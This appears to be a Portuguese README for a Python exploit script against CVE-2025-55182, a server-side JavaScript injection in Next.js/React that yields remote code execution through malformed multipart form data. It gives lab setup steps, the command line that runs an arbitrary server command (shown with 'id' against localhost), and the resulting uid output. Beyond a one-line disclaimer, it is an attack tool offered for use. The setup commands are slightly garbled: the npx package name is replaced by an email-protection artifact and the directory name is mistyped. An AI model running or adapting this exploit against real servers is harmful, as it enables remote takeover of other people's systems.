
Exploração em Python para CVE-2025-55182, uma injeção de JavaScript no lado do servidor em Next.js/React que permite execução remota de código por meio de dados de formulário multipart malformados. Inclui configuração de laboratório para testes autorizados.
Script Python 3 que pode ser usado para demonstrar CVE-2025-55182. Ele explora uma vulnerabilidade de injeção de JavaScript no lado do servidor em aplicações Next.js/React, permitindo execução remota de código através de dados de formulário multipart malformados.
⚠️ Apenas para fins educacionais e de teste autorizado.
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start
pip install requests
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"
-u Domínio ou IP alvo com protocolo - http://localhost:3000 -c Comando para executar no servidor - id
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)